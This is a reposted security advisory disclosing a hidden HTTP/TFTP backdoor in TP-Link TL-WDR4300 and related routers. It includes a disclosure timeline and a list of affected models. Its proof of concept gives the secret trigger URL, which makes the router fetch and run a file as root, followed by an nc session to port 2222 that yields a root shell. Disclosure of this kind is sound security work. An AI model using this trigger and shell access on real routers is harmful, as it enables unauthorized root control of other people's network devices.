About the TP-Link Router
TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.
Tested Firmware
We tested the remote root PoC on the newest firmware (published on 25.12.2012):
TL-WDR4300 – tested firmware version
The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability.
Proof of Concept
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"
[ <=> ] 426 --.-K/s in 0s
2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]
root@secu:~# nc 192.168.0.1 2222
ps
PID Uid VmSize Stat Command
1 root 404 S init
2 root SW< [kthreadd]
3 root SW< [ksoftirqd/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [async/mgr]
7 root SW< [kblockd/0]
8 root SW [pdflush]
9 root SW [pdflush]
10 root SW< [kswapd0]
17 root SW< [mtdblockd]
18 root SW< [unlzma/0]
71 root 2768 S /usr/bin/httpd
76 root 380 S /sbin/getty ttyS0 115200
78 root 208 S ipcserver
82 root 2768 S /usr/bin/httpd
83 root 2768 S /usr/bin/httpd
86 root 732 S ushare -d -x -f /tmp/ushare.conf
92 root 348 S syslogd -C -l 7
96 root 292 S klogd
101 root SW< [napt_ct_scan]
246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root 2768 S /usr/bin/httpd
299 root 2768 S /usr/bin/httpd
300 root 2768 S /usr/bin/httpd
305 root 2768 S /usr/bin/httpd
307 root 2768 S /usr/bin/httpd
309 root 2768 S /usr/bin/httpd
310 root 2768 S /usr/bin/httpd
389 root 2768 S /usr/bin/httpd
Details
After the following HTTP request is sent:
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
the router downloads a file (nart.out) from the host which has issed the http request and executes is as root:
PoC – diagram
Sample captures from the host which issues the http request:
Wireshark filter used to show router tftp traffic
nart.out tftp request
Models affected
TL-WDR4300
TL-WR743ND (v1.2 v2.0)
…
History of the bug
12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure
More information
http://sekurak.pl/more-information-about-tp-link-backdoor/
– Michal Sajdak
from: http://sekurak.pl/tp-link-httptftp-backdoor/
文章来源于lcx.cc:TP-Link http/tftp backdoor
相关推荐: Visual Basic - 语言常用的颜色常数速查表
Visual Basic 语言颜色常数表 因为这些常数是在 VBScript中设置, 您在应用之前不必定义它们. 您可在代码中任意处应用它们以表明说明值。 常数 值 描述 vbBlack &h00 黑色 vbRed &hFF 红色 vbGree…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论